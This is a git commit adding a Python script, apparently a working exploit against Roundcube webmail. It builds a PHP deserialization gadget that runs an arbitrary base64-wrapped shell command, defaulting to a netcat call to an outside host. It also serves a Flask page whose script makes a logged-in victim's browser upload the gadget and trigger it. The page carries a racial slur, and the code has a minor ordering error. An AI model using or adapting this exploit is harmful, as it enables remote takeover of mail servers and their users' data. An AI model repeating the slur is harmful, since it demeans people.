commit 888cdd23be9a2f82538bf1eab5928eeda642a22a
Author: evan <1+e@noreply.gitea.im0.zenith.hosting>
Date:   Wed Jun 17 14:04:21 2026 +0000

    Add xp.py

diff --git a/xp.py b/xp.py
new file mode 100644
index 0000000..76ac647
--- /dev/null
+++ b/xp.py
@@ -0,0 +1,87 @@
+import argparse
+import base64
+from flask import Flask, Response
+print("vantage")
+WHITE = base64.b64decode("/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAABAAEDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYI4Q/RFhHRUYnJCk6OTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2drh4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD3+gD/2Q==")
+
+
+def gbuild(command):
+    encoded = base64.b64encode(command.encode()).decode()
+    gpgconf = f'`echo "{encoded}"|base64 -d|/bin/sh`;'
+    gpgconf = gpgconf.replace(" ", "${IFS}")
+    # same pop chain
+    return f'O:17:"Crypt_GPG_Engine":3:{{s:12:"\x00*\x00_process";b:0;s:11:"\x00*\x00_gpgconf";s:{len(gpgconf)}:"{gpgconf}";s:11:"\x00*\x00_homedir";s:0:"";}}'
+
+
+def pbuild(rc_url, gadget):
+    imgb64 = base64.b64encode(WHITE).decode()
+    gadgetb64 = base64.b64encode(gadget.encode("latin-1")).decode()
+    return f"""
+<!DOCTYPE html>
+<html>
+<head><title>hi</title></head>
+<body>
+<p>lol nigger</p>
+<script>
+async function run() {{
+  const rc = {rc_url!r};
+  const jpeg = Uint8Array.from(atob("{imgb64}"), c => c.charCodeAt(0));
+  const gadgetName = new TextDecoder("latin1").decode(
+    Uint8Array.from(atob("{gadgetb64}"), c => c.charCodeAt(0))
+  ) + ".jpg";
+
+  const fd = new FormData();
+  fd.append("_file[]", new Blob([jpeg], {{type:"image/jpeg"}}), gadgetName);
+
+  await fetch(rc + "/?_task=settings&_action=upload&_from=preferences&_uploadid=x", {{
+    method: "POST",
+    mode: "no-cors",
+    credentials: "include",
+    body: fd
+  }});
+
+  await new Promise(r => setTimeout(r, 1000));
+
+  await fetch(rc + "/?_task=mail", {{
+    mode: "no-cors",
+    credentials: "include"
+  }});
+
+  await new Promise(r => setTimeout(r, 500));
+
+  await fetch(rc + "/?_task=mail", {{
+    mode: "no-cors",
+    credentials: "include"
+  }});
+
+}}
+run();
+</script>
+</body>
+</html>"""
+
+@app.route("/")
+def index():
+    return Response(html, content_type="text/html")
+
+
+p = argparse.ArgumentParser()
+p.add_argument("-r", "--maillink", required=True)
+p.add_argument("-c", "--command", default="nc 1.1.1.1 1234", help="shell cmd")
+p.add_argument("-p", "--port", type=int, default=8888)
+p.add_argument("--host", default="0.0.0.0")
+args = p.parse_args()
+
+gadget = gbuild(args.command)
+print(f"+ {args.command} on {args.maillink}")
+
+html = pbuild(args.maillink.rstrip("/"), gadget)
+
+app = Flask(__name__)
+
+
+print("+ serving page")
+
+
+
+app.run(host=args.host, port=args.port)
\ No newline at end of file